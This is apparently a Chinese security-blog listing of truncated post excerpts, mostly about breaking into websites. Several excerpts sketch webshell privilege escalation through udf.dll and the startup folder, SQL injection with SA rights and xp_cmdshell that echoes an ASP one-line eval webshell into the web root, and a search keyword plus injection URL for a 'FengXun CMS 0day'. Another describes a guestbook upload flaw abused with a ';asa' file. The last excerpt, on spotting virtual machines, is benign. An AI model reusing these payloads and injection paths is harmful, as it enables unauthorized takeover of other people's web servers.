-
phpshell写入启动项提权
实际操作中可以在webshell用udf.dll提权,用函数的上传文件功能上传文件到启动目录,再用shut函数重起系统.(目前没成功过,有机会本地测试一下,先记录在这了).如果是英文版的系统,启动目录在 "C:\\Document...
-
SA权限ECHO写一句话
注入点是SA权限.xp_cmdshell是存在的.找到网站主目录 dir d:\wwwroot找到站点的目录后.Echo ^<%eval request("#")%>^ >d:\wwwroot\xx\o...
-
风讯CMS 0DAY exploits
关键字: inurl:User/Reg_service.asp风讯的注册页面...漏洞页面:/user/SetNextOptions.asp利用方法:构造注入user/SetNextOptions.asp?sType=1&EquVa...
-
随缘网络留言板v2漏洞
好像有2个版本一个是asp的一个是php的数据库路径 db/sywl.asp漏洞文件 up2.asp 内容太大了...也没什么好解的将以下代码存为 ;asa 直接上传 得到路径-_, (当然大牛们也可以自己构造一个一句话)前面不要加,加...
-
如何判断Linux是否运行在虚拟机上
在有些奸商会把虚拟机当作独立服务器卖,这里简单介绍一下市面上常用虚拟技术(包括容器技术)的判别小技巧。 判断 OpenVZ/Xen PV/UML 判断 OpenVZ/Xen PV/UML 是最容易的,直接检查 /proc 下的相关目录和文件...
